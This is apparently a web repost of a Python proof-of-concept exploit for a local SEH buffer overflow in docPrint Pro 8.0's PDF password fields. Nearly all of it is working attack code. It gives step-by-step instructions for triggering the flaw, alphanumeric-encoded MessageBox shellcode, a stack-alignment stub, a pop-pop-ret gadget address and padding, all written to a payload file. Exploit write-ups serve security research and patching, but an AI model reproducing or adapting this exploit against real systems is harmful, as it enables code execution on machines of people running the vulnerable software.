docprint pro 8.0 seh buffer overflow

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docprint pro 8.0 seh buffer overflow Code Code...
import struct # Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow # Date: September 14th, 2019 # Author: Connor McGarr (@33y0re) ( # Vendor Homepage: # Software Link: # Version: 8.0 # Tested on: Windows 10 and Windows 7 # TO RUN: # 1. Create a blank file named "test.pdf" # 2. Open doc2pdf_win.exe # 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File" # 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay" # 5. Click "Add File(s)" # 6. Select the "test.pdf" file created from step 1. # 7. Press on "Start" and name the file "exploit.pdf" # Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII) # Zero out registers for calculations. zero = "\x25\x01\x01\x01\x01" zero += "\x25\x10\x10\x10\x10" # Stack alignment alignment = "\x54" # push esp alignment += "\x58" # pop eax alignment += "\x2d\x1a\x50\x55\x55" # sub eax, 0x1a505555 alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555 alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555 alignment += "\x50" # push eax alignment += "\x5c" # pop esp # Custom created and encoded MessageBox POC shellcode. # Utilized aplication DLL with no ASLR for Windows API call to MessageBox function. # \x31\xc0\x50\x68 # \x42\x41\x4a\x41 # \x89\xe1\x50\x68 # \x42\x41\x4a\x41 # \x89\xe2\x50\x50 # \x51\x52\x50\xbe # \x38\x20\x00\x10 # \xff\xe6\x41\x41 # 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!) shellcode = zero # zero out eax shellcode += "\x2d\x55\x15\x4f\x53" # sub eax, 0x534f1555 shellcode += "\x2d\x55\x02\x4f\x53" # sub eax, 0x534f0255 shellcode += "\x2d\x57\x01\x50\x53" # sub eax, 0x53500157 shellcode += "\x50" # push eax # 4F554A42 4F554A42 51554B44 shellcode += zero # zero out eax shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42 shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42 shellcode += "\x2d\x44\x4b\x55\x51" # sub eax, 0x51554b44 shellcode += "\x50" # push eax # 153A393A 153A393A 173B3B3B shellcode += zero shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x173b3b3b shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a shellcode += "\x2d\x3b\x3b\x3b\x17" # sub eax, 0x173b3b3b shellcode += "\x50" # push eax # 3A3A1927 3A3A0227 3B3B0229 shellcode += zero # zero out eax shellcode += "\x2d\x27\x19\x3a\x3a" # sub eax, 0x3a3a1927 shellcode += "\x2d\x27\x02\x3a\x3a" # sub eax, 0x3a3a0227 shellcode += "\x2d\x29\x02\x3b\x3b" # sub eax, 0x3b3b0229 shellcode += "\x50" # push eax # 3F3C3F3F 3F3C3F3F 403D4040 shellcode += zero # zero out eax shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040 shellcode += "\x50" # push eax # 323A1A27 323A0227 333B0229 shellcode += zero # zero out eax shellcode += "\x2d\x27\x1a\x3a\x32" # sub eax, 0x323a1a27 shellcode += "\x2d\x27\x02\x3a\x32" # sub eax, 0x323a0227 shellcode += "\x2d\x29\x02\x3b\x33" # sub eax, 0x333b0229 shellcode += "\x50" # push eax # 3F3C3F3F 3F3C3F3F 403D4040 shellcode += zero # zero out eax shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040 shellcode += "\x50" # push eax # 323A1545 323A1545 333B1545 shellcode += zero # zero out eax shellcode += "\x2d\x45\x15\x3a\x32" # sub eax, 0x323a1545 shellcode += "\x2d\x45\x15\x3A\x32" # sub eax, 0x323a1545 shellcode += "\x2d\x45\x15\x3b\x33" # sub eax, 0x333b1545 shellcode += "\x50" # push eax # Let's roll. payload = "\x41" * 1676 payload += "\x70\x06\x71\x06" # JO 6 bytes. If fails, JNO 6 bytes payload += struct.pack('<L', 0x10011874) # pop ebp pop ebx ret reg.dll payload += "\x41" * 2 # Padding to reach alignment payload += alignment payload += shellcode payload += "\x45" * (6000-len(payload)) # Write to file f = open('bajablast.txt', 'w') f.write(payload) f.close()

Docprint pro 8.0 seh buffer overflow Vulnerability / Exploit Source : Docprint pro 8.0 seh buffer overflow

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